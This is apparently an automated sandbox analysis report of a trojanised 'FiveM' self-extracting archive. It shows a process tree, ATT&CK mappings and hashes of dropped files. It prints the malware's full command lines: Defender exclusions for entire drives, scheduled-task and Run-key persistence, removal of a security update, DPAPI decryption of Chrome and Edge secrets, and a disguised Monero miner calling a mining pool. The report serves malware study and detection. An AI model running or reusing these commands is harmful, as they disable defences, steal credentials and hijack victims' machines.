      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3492
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:64
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      PID:3112
    - - C:\Users\Admin\AppData\Local\Temp\services64.exe
        
        C:\Users\Admin\AppData\Local\Temp\services64.exe
        5⤵
        Executes dropped EXE
        
        PID:3504
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        6⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:1860
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:3140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4688
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:4500
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:4836
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=44tR22o4E8HYHFrMJeXruQYqEwLuXTGwiGHa2P5S6CPReNh6TC1z3p3HSC97upDwboECfSVrPD2LzGYortC66JuTFuvjMGb --pass=x --cpu-max-threads-hint=70 --cinit-kill-targets="" --tls --cinit-kill
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1852
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\6dzlAID88z.ps1""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\6dzlAID88z.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2968
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\unqgh4b4\unqgh4b4.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3604
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B8B.tmp" "c:\Users\Admin\AppData\Local\Temp\unqgh4b4\CSCA233CDA526954B3EA23DB0433D55312A.TMP"
        6⤵
        
        PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2888
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,164,61,33,122,12,185,122,77,183,105,249,118,216,100,46,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,173,23,58,226,64,18,35,252,62,109,217,109,50,51,70,111,155,222,242,9,224,37,157,230,165,68,165,185,211,49,49,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,167,19,28,55,35,159,72,144,232,138,95,53,207,241,45,125,38,169,214,195,58,208,191,244,96,113,176,71,7,141,190,38,48,0,0,0,117,66,159,130,233,245,228,59,130,121,106,47,234,101,128,129,29,214,246,33,124,187,113,167,162,66,114,171,21,245,192,210,106,157,167,55,233,2,167,60,61,141,32,49,90,109,101,222,64,0,0,0,144,153,26,55,173,144,182,243,129,105,154,36,244,161,139,131,140,172,123,98,175,199,251,53,161,181,16,196,110,7,180,160,85,239,33,43,244,195,4,27,254,254,42,165,198,142,157,194,60,211,81,249,249,106,146,250,202,34,9,88,135,200,7,98), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    PID:5104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,164,61,33,122,12,185,122,77,183,105,249,118,216,100,46,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,173,23,58,226,64,18,35,252,62,109,217,109,50,51,70,111,155,222,242,9,224,37,157,230,165,68,165,185,211,49,49,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,167,19,28,55,35,159,72,144,232,138,95,53,207,241,45,125,38,169,214,195,58,208,191,244,96,113,176,71,7,141,190,38,48,0,0,0,117,66,159,130,233,245,228,59,130,121,106,47,234,101,128,129,29,214,246,33,124,187,113,167,162,66,114,171,21,245,192,210,106,157,167,55,233,2,167,60,61,141,32,49,90,109,101,222,64,0,0,0,144,153,26,55,173,144,182,243,129,105,154,36,244,161,139,131,140,172,123,98,175,199,251,53,161,181,16,196,110,7,180,160,85,239,33,43,244,195,4,27,254,254,42,165,198,142,157,194,60,211,81,249,249,106,146,250,202,34,9,88,135,200,7,98), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,164,61,33,122,12,185,122,77,183,105,249,118,216,100,46,57,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,70,96,136,23,97,232,196,23,236,15,131,47,3,98,220,6,100,154,40,168,138,47,233,170,55,5,216,55,207,120,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,93,186,16,185,176,56,94,38,18,69,151,120,64,123,189,182,116,165,205,106,221,248,198,170,129,178,6,111,143,178,16,48,0,0,0,2,87,51,176,5,232,194,197,177,98,39,83,181,73,130,234,249,123,153,34,103,103,231,28,92,67,202,93,35,83,25,23,147,160,83,225,90,0,94,77,98,207,123,60,57,170,133,243,64,0,0,0,70,211,83,111,77,127,96,68,203,185,188,21,183,217,244,180,71,78,241,65,174,189,255,2,107,74,104,61,138,164,230,232,140,14,33,123,35,124,165,97,112,231,172,216,199,17,27,164,75,141,41,255,65,205,22,36,38,159,197,36,43,121,87,182), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    PID:3052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,164,61,33,122,12,185,122,77,183,105,249,118,216,100,46,57,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,70,96,136,23,97,232,196,23,236,15,131,47,3,98,220,6,100,154,40,168,138,47,233,170,55,5,216,55,207,120,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,93,186,16,185,176,56,94,38,18,69,151,120,64,123,189,182,116,165,205,106,221,248,198,170,129,178,6,111,143,178,16,48,0,0,0,2,87,51,176,5,232,194,197,177,98,39,83,181,73,130,234,249,123,153,34,103,103,231,28,92,67,202,93,35,83,25,23,147,160,83,225,90,0,94,77,98,207,123,60,57,170,133,243,64,0,0,0,70,211,83,111,77,127,96,68,203,185,188,21,183,217,244,180,71,78,241,65,174,189,255,2,107,74,104,61,138,164,230,232,140,14,33,123,35,124,165,97,112,231,172,216,199,17,27,164,75,141,41,255,65,205,22,36,38,159,197,36,43,121,87,182), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    PID:1692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Rename_Z60IHLDjO6 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
    3⤵
    PID:1452
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Rename_Z60IHLDjO6 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
      4⤵
      Adds Run key to start application
      PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.0C1Tm27W0Z""
    3⤵
    PID:1556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.0C1Tm27W0Z"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
    3⤵
    PID:4452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:4628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
    3⤵
    PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    3⤵
    PID:5008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_computersystemproduct get uuid
      4⤵
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
    3⤵
    PID:3676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Description,PNPDeviceID
      4⤵
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
    3⤵
    PID:4196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get serialnumber
      4⤵
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:3948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
    3⤵
    PID:3276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get processorid
      4⤵
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
    3⤵
    PID:4648
  - - C:\Windows\system32\getmac.exe
      getmac /NH
      4⤵
      PID:1548

C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:684
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4528
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1708
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
646B

MD5
23867f73ff39fa0dfee6cfb5d3d176ab

SHA1
8705a09d38e5f0b034a6f4b4deb5817e312204e1

SHA256
f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88

SHA512
108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
695fae7a6823c82caedd624c0b81b273

SHA1
3525f105ac172a9fe0c8c0badda0b95414605427

SHA256
1aa6a774587c2b3dedbd461df873a5a7d9bd321de3dd22fbb3bf82c5be7ce8fb

SHA512
5c2499aaed6cf0c45b5789a48b35af947a7d095b05c4a05055451c9162443def2c08672dea9e1c8d14e37e3149e38b9a8b1837d889e0b69ed48b4024cae525e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
46d6c89b6a449ce91c1a3691c516e10e

SHA1
dedf2c05d83a8fc311e39fa86af575866f9f7ece

SHA256
f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f

SHA512
bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59318e342c77ed30ae5d9ac4099bd4fe

SHA1
1b8a1581f36b52e81baa7c1ff9359697ef7151a6

SHA256
733ad4eda5f0182e4a3de4391d59b56bb8873606cfdad31645b71423d24c6de5

SHA512
00cf712a8a113451806459eb437359ca5d1b9238f9d0e32610537383454a7ed890a3eb81e108065402fdfa9f1eaf8f6e42967321d35e461f53b71fa480c9b918

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
17176e83a2fa0d5793c243103f4931c8

SHA1
8069167680d2ead050ba803d7ccf1cce55a33f0b

SHA256
7f24247521e04c41593ad3cba5d881660f81e997c1a54675a6ccf359d9a2b426

SHA512
923cbcf914b7cff43d320759f0a8ebf878b2e3276d0893971410d59498feb40823cef53e68e9f4dd56e4069bca8f002ea188afb68e74ef9d35c6a16381aa9c3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a7cc007980e419d553568a106210549a

SHA1
c03099706b75071f36c3962fcc60a22f197711e0

SHA256
a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

SHA512
b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Temp\6dzlAID88z.ps1

Filesize
380B

MD5
cbb9a56c9c8d7c3494b508934ace0b98

SHA1
e76539db673cc1751864166494d4d3d1761cb117

SHA256
027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

SHA512
f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4B8B.tmp

Filesize
1KB

MD5
a36708b5a88276e0fd069a033bcb6443

SHA1
c2b07e4dd8992ca3c8897d002636677a99fe75c9

SHA256
934e7a7bc7b564cba0635dbccf070a25e400f518d815e756ff5214c55473147a

SHA512
4dfe0cc1f05452861f2bb9b7028993ce395d573c5f31f274a167267011128ccaa744bef2b435335cf30dd64633c78f270e23f1060997e9aa3b82e9d383d5593c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe

Filesize
29.8MB

MD5
00ce1e4793d5a4876cbb00df76e58e8c

SHA1
872387a2e9125ffe3e173fbae32280b423c5c128

SHA256
36e8a050ec80df43c8fec1cea5cde9fbb09f432ec58848399dd666a992948679

SHA512
df73de1b15f1b291af87387decc436139b52e262ef7b3500124d9e920fb1af4b99632320e0b48211b9b2151b1fcb3f4aff61ac7c2dbd6de92699dfcd11444e47

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Rename_Z60IHLDjO6.exe

Filesize
37.2MB

MD5
62b8cb69f7c3ce2c5a843a8fa66b580f

SHA1
5f0440dface4bb25bbe3ee0a7dc7223b36eca37a

SHA256
8c586ec7de39427fa8fc2480c10eb2e04728793e2033e3103ed140f1b4cfb535

SHA512
ffc19d8d3f5cd6be99065203e5fc59ad993122c9bab91c243f62390e2aff6b710a63fe0c84776822fcd5ab195eb6cfa94ed7275d0ba336d50fa32afb26141e9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe

Filesize
23KB

MD5
046a99195ebe039bdb825ebd1ce560a4

SHA1
24ccf20694cf13269313d21c5b7bc4e3dff64d7b

SHA256
cc8e70780dc86ab74f1bba933145bd931e69a9334b21c270486b24ec67cbc522

SHA512
c5d1e5d73010283eb2975a52cc49841a3c89dd93e040b20ab5e17f763135af8cf3570dcc6d43cd25d42f117f480f82d359fd56542100f9d76e4e2b8e1c1cdc17

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe

Filesize
2.5MB

MD5
ad60579bf765225e548e30a8068d03b9

SHA1
87abbf7819cd3e354a24aaeec6e1e2d77b01a72e

SHA256
9c40ef00c2bae13077c19a89a712ed3ba1786096b7360b04a6ca004bf9fc6434

SHA512
e4a26dc6d00e8117060002475861bf8224deeec6f74bedfd9070c8d5bad21cc83ae8bd8230a0a2d2d2267c1ecffa2b532f87792f9d2c3cd1ee3c55ace15d7146

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0vsezflq.gvn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\unqgh4b4\unqgh4b4.dll

Filesize
3KB

MD5
30c9280eaf626fe38833b47e3f37f253

SHA1
5fd45297378cacfbcc7f6c0d24ccd5adf04c2173

SHA256
7a0f0e27d284c70ad00590843e8527332daced7dc6edcf42331b0dd7d5ae2f2c

SHA512
537516d2e8e6978cb60c0526947e3e911532dcbc24b713a7eb1dba6892451c44ba8435dade7a75975ed6301ad9b4acaa16837a7a78a5067cf39526685ec83e9a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
8edd8bd78fea19573ddf2d6dc10e5ea3

SHA1
f1d835a1696fddaf770046fa5eba9708bca3e1e0

SHA256
d8dbb7eb7c461222f348f2fbe4505142aa88c0cce3074cd0596f402e89084a1c

SHA512
731c16fb9a2558e9c98505e6252f5235b20f4b2de37512a62a5b2d1876a0f8bfee1ef5f0dde4a4226d399200b1c66286b9406ec3e5f1476c8cea3a0eab51f506

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\unqgh4b4\CSCA233CDA526954B3EA23DB0433D55312A.TMP

Filesize
652B

MD5
81f63304dd51685dcf48f0cf88d07527

SHA1
c1883413fc70172d8bb241aa209bca1220951cc6

SHA256
c6c9ca66561ae3b0769aca20c5125b8351750a262bd1fc232e09b910a0cfd2ce

SHA512
8331641eaec7018b58480c88313dcddbb5fbb07b32843e04cc0f6ea64c7f532727b4bbfe593d8af6786792ceba7658a224cfd8c7b6858e77795c91787b166acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\unqgh4b4\unqgh4b4.0.cs

Filesize
312B

MD5
ecbf151f81ff98f7dff196304a40239e

SHA1
ccf6b97b6f8276656b042d64f0595963fe9ec79c

SHA256
295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8

SHA512
4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\unqgh4b4\unqgh4b4.cmdline

Filesize
369B

MD5
83d9135bee2b2aa26992e99e06c5340f

SHA1
cef0c6c5080a290a7f25bd5c57c86da09a0a1a77

SHA256
45a9eb12fab83316c527474b949f1cc25e2828364b6a199f2e240b51359e2fd1

SHA512
341079c253269ab3ab0062c6e69481b00601112d362890d54ac49867ef769eff233bacc97270733c9e7f8622b09b99001a532027817a2f33eeb305a580268467

Download Submit
memory/404-21-0x0000000073510000-0x0000000073AC1000-memory.dmp

Filesize
5.7MB

Download
memory/404-20-0x0000000073510000-0x0000000073AC1000-memory.dmp

Filesize
5.7MB

Download
memory/404-19-0x0000000073512000-0x0000000073513000-memory.dmp

Filesize
4KB

Download
memory/404-32-0x0000000073510000-0x0000000073AC1000-memory.dmp

Filesize
5.7MB

Download
memory/756-119-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/756-113-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/756-112-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
